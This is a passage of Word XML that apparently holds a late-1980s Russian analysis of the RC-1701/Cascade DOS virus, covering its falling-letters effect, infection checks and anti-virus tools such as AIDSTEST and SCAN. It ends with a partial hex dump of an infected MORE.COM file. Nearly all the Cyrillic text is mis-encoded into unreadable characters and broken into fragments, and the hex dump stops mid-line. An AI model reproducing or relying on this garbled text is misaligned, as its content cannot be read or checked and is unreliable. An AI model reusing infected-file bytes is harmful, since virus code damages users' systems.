        <w:t>,  �᫨ �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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B, PSP � 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ� ������� ᥡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ��⠥��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१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⮣�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �⮡� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮭ��⥫� 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⭠� ���� ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뫠 㤠���� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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筮 ⮭��� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ������������ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᤢ��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥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 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥡ� �� �᢮�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">襥�� ���� � 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饩 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>४�஢�� ��⥬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樮��� ��䥪� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祬  �᫮���  ��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� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪, �� �� ������ � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮���� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">設�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>XT,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.  �� AT ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㠫�� ��䥪� �������� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭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⨩ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠫ 1988 ����.  � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠������ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �᫨ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦠��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� �� �⬥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭 ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,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᢮� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢨� � ������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䥪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭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"������ �������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१ ��।������  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢠ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �  �����  �������  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㪢 ��������� ���������� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ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஬ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭������ ���������� �� ������� ��������  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪢  �� 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������� ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㪢� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮯ஢�������� �ࠪ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,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騬 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">樠���⮢ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"��⪠" ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந������ ����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⭮� ��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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣨� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樮��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢨� ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮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⮬� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>楫�� ��� ���⥫쭮��� ����� �뫮 �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠪ�ਧ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㫨����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮,  �᫨ �� �� ���� �����⥫��⢮.  ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㥬�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>२����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥��� � AUTOEXEC.BAT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뢠�� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS.  �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �  ��⭮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���� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1840 �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">筮 ����砥��� � </w:t>
      </w:r>
      <w:r>
        <w:rPr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E1840.COM (EDISK.COM),  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稢��饩 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ������� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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᪮�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠ �� ��� �����᪨�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� 360� ����� (� � � �� ����� ��᪮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B � D �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).  ��-��������, ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䥪� �� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�ᬮ�७ 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稪�� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祬 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮������� ���  ��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥��⢥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⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����� � E1840 ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦨�� ����來�� �������樥� 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䠪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ��⥬��� �ணࠬ� ����� ����� ᮧ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⮬� ���  ���������  ������  ᫥��� ���������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤠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� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���� �᫨ ��⥬ ������� ��� �� �������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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��, �� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ���⥫��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢨� ��� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⭠� ���� ����� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦨������ ��⥬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬮ�� 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१������� �ணࠬ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(� ������� �⨫�� MAP,  SMAP,  MMAP � �.�.)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>ਢ������ ���� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯨ᪥ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ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�������⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭠� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� ��� ����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த�⥫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� �ணࠬ�� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RC-1701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 �஢���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㥬��� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DOS ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>FE)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稥 ����� � ����⨢��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. �᫨ ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦥 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१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୮� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯨ᮪ १������� �ணࠬ� �� �ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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ᯨ᪥  १������� �ணࠬ� ������� ������ ����� �ਭ�����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RC-1701 ���� ����� �� �������� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>�  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 �।�ਭ��� ��।������ �ᨫ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ����� �� �᫮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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥬ���஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  � ��⭮��,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮���� ���� ⥫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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">樨 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪫���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饥 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>". ���⮬� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।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ᥬ���஢���� ��ࠦ����� �ணࠬ�� ������  ����ᥬ���஬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樨 � ������� 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 xml:space="preserve">஢��  ������   �� �����   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���⮬�   ��� ��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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ���  �����  ��  �����  ����  �����ப  ��  �᪫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭��� ��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⠫����.  ��  ⮩  ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稭�  ⥪�⮢��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப  ⥫�  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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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 �����  � �������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ய� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t xml:space="preserve">ࢮ� �������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1988</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">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. ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ����� [50]). �� �⮬ ⠪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᢨ��⥫������ ���� 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ᨩ �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SE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 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤥��� � ������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਪ������  ��⥬�⨪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������ (���  �� ����).  B ����� ����� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 �.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�᫥����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.�.���⭮�,  ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ����⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⠫  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣 ��� �⮣� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騩 ��� ��������� ��⮪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 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>루��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠ ����� ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਬ�୮ �����६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ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���⮬� ����⢥����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।� 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।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮� ����� �� ������� ����� � �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뫠  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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筠�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" (����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>਩᪠�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">SERUM3, ����� ����� ⠪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ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 ��⥪��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮��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砫쭮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠤�� ����� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ᫥��� �⬥��� ��⥪�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">루��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) VIRUS_D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ଠ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>浪�  ����⪠  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ����  ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।� 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ing Letters (�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騥 �㪢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>),  LetterFall (�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>),  Cascade (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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>窠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>), Rash (���), ����� ������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, 1701, Letters (�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㪢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�⨪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⥪��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� �����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701/1704  Virus   -      Version  B [170X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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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騥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠  ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 ��䥪⨢�� ��⨢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⭮��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����⪨ ����� ����� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� ��⥪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ᥬ�  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騬���  䨫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ������ ANTI4US2 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠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>१������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��᪮��� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।���⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮  ���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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮�����  ��⥬�  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ�����  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯮� � �������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(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Advanced Disk Manager � �.�.) ����� �� �  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﭨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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�������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��� ������ ��⠭����� ����� READ ONLY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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭������ ���������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>맮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥�� ��� 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樠��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠ ����� �� ������� �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樯���쭮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⥪��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠣 ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१����⭮� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ � �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��⨢��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樭� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨢ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⥪�� �����  ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ���  ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮  �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮�� ���᪠ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫���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 �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��᪮��� ��⠫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭠� ���� ����� ������� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��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㦥 � ����� �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饥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� �� ᮯ஢������� ������⥪��� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ����� ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>४�������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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤮���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AIDSTEST �.�.�����᪮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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MORE.COM, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RC-1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0  E9 18 01 21 3D 03 1E 74 09 BA FC 01 B4 09 CD 21  ...!=..t....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  CD 20 C6 06 E5 01 19 B4 0F CD 10 88 26 E6 01 BA  . ..........&amp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0  17 02 B4 09 CD 21 33 DB B4 45 CD 21 8B E8 B4 3E  .....!3..E.!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0  CD 21 BB 02 00 B4 45 CD 21 FC BA 1A 02 B9 00 10  .!....E.!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0  8B DD B4 3F CD 21 0B C0 75 02 CD 20 8B C8 8B F2  ...?.!..u..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0  AC 3C 1A 74 F5 3C 0D 75 07 C6 06 E8 01 01 EB 4C  .&lt;.t.&lt;.u.......L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0  3C 0A 75 06 FE 06 E7 01 EB 42 3C 08 75 0D 80 3E  &lt;.u......B&lt;.u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0  E8 01 01 74 37 FE 0E E8 01 EB 31 3C 09 75 12 8A  ...t7.....1&lt;.u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0  26 E8 01 80 C4 07 80 E4 F8 FE C4 88 26 E8 01 EB  &amp;...........&amp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0  1B 3C 07 74 17 FE 06 E8 01 8A 26 E8 01 3A 26 E6  .&lt;.t......&amp;..:&amp;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0  01 76 09 FE 06 E7 01 C6 06 E8 01 01 8A D0 B4 02  .v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0  CD 21 8A 26 E7 01 3A 26 E5 01 72 20 BA F0 01 B4  .!.&amp;..:&amp;..r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C0  09 CD 21 B4 0C B0 01 CD 21 BA 17 02 B4 09 CD 21  ..!.....!...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>01D0  C6 06 E8 01 01 C6 06 